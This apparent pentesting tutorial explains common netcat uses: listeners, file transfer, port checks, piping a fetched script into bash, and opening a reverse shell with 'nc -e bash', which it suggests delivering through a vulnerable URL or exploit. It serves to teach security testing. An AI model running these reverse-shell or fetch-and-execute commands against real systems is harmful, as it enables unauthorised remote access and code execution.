Netcat is a super useful tool for a pentester. It gives you the ability to use the raw sockets. Ncat is similar tool and that can be used on windows. Both are nearly same regarding functionality. Here I will discuss the most common uses of netcat. It can be used for port scanning,banner grabbing,chatting but most commonly it is used for getting a reverse shell and for file transfer.
To set up a Netcat listener on your linux system, type this command in your terminal:
nc -nvlp 1337
n for no dns lookup,v for verbose output,l for listener and p for port.
To connect to a port,
nc -np 1337 127.0.0.1
Now,if you want to tranfer a file through netcat,
nc -nvlp 1337 < shell.sh
Just pipe your file to netcat listener,and when a client will connect to it,it will send the file automatically. This is super handy when you are testing a system and there is no curl or wget is installed.
To receive the file just connect to the netcat listener but ince connected it will print the content of the file to stdout (your terminal window) and this is not very much useful. Here you can do two thing.
One is pipe it to a file,
nc -np 1337 127.0.0.1 > shell.sh
This way output will be saved into a file. Another thing you can do is,if that file is a shell script and you want to run it then you can directly run it by just piping to bash or whatever shell you have.
nc -np 1337 127.0.0.1 | bash
This will execute the script. The last example is used when you want to enumerate target system,just get the enumeration script and run it with bash.
Now, another important use is netcat reverse shell. On your target system you can get a reverse shell with netcat.
Set up listener on your local machine: nc -nvlp 1337
Then connect to it from target system: nc -e bash 127.0.0.1 80
Once executed,you will get a bash shell from target system. You can send this command as payload through a file,through a vulnerable url or by any other exploit.
To find a a port is open or not on your target system just try to connect to that port from netcat and you will get a response back if that is open,this is handy for quick banner grabbing and confirming if that port is open or not.
nc 127.0.0.1 443
It will test if https is open or closed on your localhost.
Netcat has lot more capabilitiesand you can read those from its man page or with nc –help command.
Set listener: nc -lvnp 1337
Connect to a socket: nc 127.0.0.1 1337
Send a file: nc -lvnp 1337 < file.txt
Get a file: nc 127.0.0.1 1337 > file.txt
Execute a shell script: nc 127.0.0.1 1337 | bash
Reverse shell: nc -e bash 127.0.0.1 1337